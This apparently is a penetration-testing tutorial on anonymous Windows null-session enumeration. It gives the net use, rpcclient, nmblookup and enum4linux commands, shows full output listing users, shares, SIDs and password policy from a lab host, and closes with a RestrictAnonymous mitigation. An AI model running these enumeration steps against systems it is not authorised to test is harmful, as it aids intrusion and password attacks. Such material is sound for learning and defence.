Null Sessions are a ‘feature’ of Windows allowing an anonymous user to connect to the IPC$ share and enumerate certain information. We can connect to this under Windows using the commands:

net use \\IP_ADDRESS\ipc$ "" /user:"" 
net use

or from Linux with:

rpcclient -U "" IP_ADDRESS

Once connected and at the “rpcclient $>” prompt, we can issue a ‘?’ to look at the supported commands. The most interesting are ‘enumdomusers’, ‘netshareenum’, ‘netshareenumall’ and ‘querydominfo’. Here’s the output against a sample lab machine:

rpcclient $> enumdomusers
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[npn] rid:[0x3f0]
user:[Guest] rid:[0x1f5]

rpcclient $> querydominfo
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
Domain:		WINSRV
Server:		
Comment:	
Total Users:	13
Total Groups:	1
Total Aliases:	0
Sequence No:	899
Force Logoff:	-1
Domain Server State:	0x1
Server Role:	ROLE_DOMAIN_PDC
Unknown 3:	0x1
rpcclient $> 


We can also use nmblookup -A IP_ADDRESS to gather further information on the host:

root@pwn:~/pen/tools/windows/enum# nmblookup -A 192.168.1.20
Looking up status of 192.168.1.20
Unable to create directory /var/run/samba for file unexpected.tdb. Error was No such file or directory
	WINSRV          <00> -         B <ACTIVE> 
	MYDOMAIN        <00> - <GROUP> B <ACTIVE> 
	MYDOMAIN        <1c> - <GROUP> B <ACTIVE> 
	WINSRV          <20> -         B <ACTIVE> 
	MYDOMAIN        <1b> -         B <ACTIVE> 

	MAC Address = 00-50-56-A0-DE-34

Lastly, we can use the excellent tool ‘enum4linux’ to enumerate just about every possible detail available, including the use of RID cycling:

./enum4linux.pl 192.168.1.20
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Aug 10 15:40:26 2013

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating MYDOMAIN/Domain on 192.168.1.20      |
 ====================================================== 
[+] Got domain/MYDOMAIN name: MYDOMAIN

 ============================================== 
|    Nbtstat Information for 192.168.1.20      |
 ============================================== 
Looking up status of 192.168.1.20
	WINSRV            <00> -         M <ACTIVE>  Workstation Service
	WINSRV            <03> -         M <ACTIVE>  Messenger Service
	ADMINISTRATOR     <03> -         M <ACTIVE>  Messenger Service
	MYDOMAIN          <00> - <GROUP> M <ACTIVE>  Domain/MYDOMAIN Name
	MYDOMAIN          <1e> - <GROUP> M <ACTIVE>  Browser Service Elections
	WINSRV            <20> -         M <ACTIVE>  File Server Service

	MAC Address = 00-50-56-AF-10-60

 ======================================= 
|    Session Check on 192.168.1.20      |
 ======================================= 
[+] Server 192.168.1.20 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.1.20      |
 ============================================= 
Domain Name: MYDOMAIN
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.1.20      |
 ======================================== 
[+] Got OS info for 192.168.1.20 from smbclient: Domain=[MYDOMAIN] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
[+] Got OS info for 192.168.1.20 from srvinfo:
	192.168.1.20 Wk Sv Sql NT SNT BMB 
	platform_id     :	500
	os version      :	5.0
	server type     :	0x29007

 =============================== 
|    Users on 192.168.1.20      |
 =============================== 
index: 0x1 RID: 0x3ef acb: 0x00000010 Account: admin	Name: (null)	Desc: (null)
index: 0x2 RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0x6 RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain

user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]

 =========================================== 
|    Share Enumeration on 192.168.1.20      |
 =========================================== 
Domain=[MYDOMAIN] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Domain=[MYDOMAIN] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       Remote IPC
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
session request to 192.168.1.20 failed (Called name not present)
session request to 192 failed (Called name not present)

	Server               Comment
	---------            -------
	WINSRV                 
	WIN-AHC4FHAF35FD     

	MYDOMAIN            Master
	---------            -------

[+] Attempting to map shares on 192.168.1.20
//192.168.1.20/IPC$	Mapping: OK	Listing: DENIED
//192.168.1.20/ADMIN$	Mapping: DENIED, Listing: N/A
//192.168.1.20/C$	Mapping: DENIED, Listing: N/A

 ====================================================== 
|    Password Policy Information for 192.168.1.20      |
 ====================================================== 

[+] Attaching to 192.168.1.20 using a NULL share

	[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] WINSRV
	[+] Builtin

[+] Password Info for Domain: WINSRV

	[+] Minimum password length: None
	[+] Password history length: None
	[+] Maximum password age: 42 days 22 hours 47 minutes
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes
	[+] Locked Account Duration: 30 minutes
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================ 
|    Groups on 192.168.1.20      |
 ================================ 

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Guests] rid:[0x222]

[+] Getting builtin group memberships:
Group 'Guests' (RID: 546) has member: WINSRV\Guest
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: WINSRV\admin
Group 'Administrators' (RID: 544) has member: WINSRV\Administrator

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: WINSRV\Administrator
Group 'None' (RID: 513) has member: WINSRV\Guest
Group 'None' (RID: 513) has member: WINSRV\admin


 ========================================================================= 
|    Users on 192.168.1.20 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-5-21-1606980848-73586283-839522115
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1606980848-73586283-839522115 and logon username '', password ''
S-1-5-21-1606980848-73586283-839522115-500 WINSRV\Administrator (Local User)
S-1-5-21-1606980848-73586283-839522115-501 WINSRV\Guest (Local User)
S-1-5-21-1606980848-73586283-839522115-502 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-503 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-504 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-505 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-506 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-507 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-508 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-509 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-510 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-511 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-512 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-513 WINSRV\None (Domain Group)
...

This vulnerability can be mitigated by setting the DWORD value ‘RestrictAnonymous’ to 1 in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA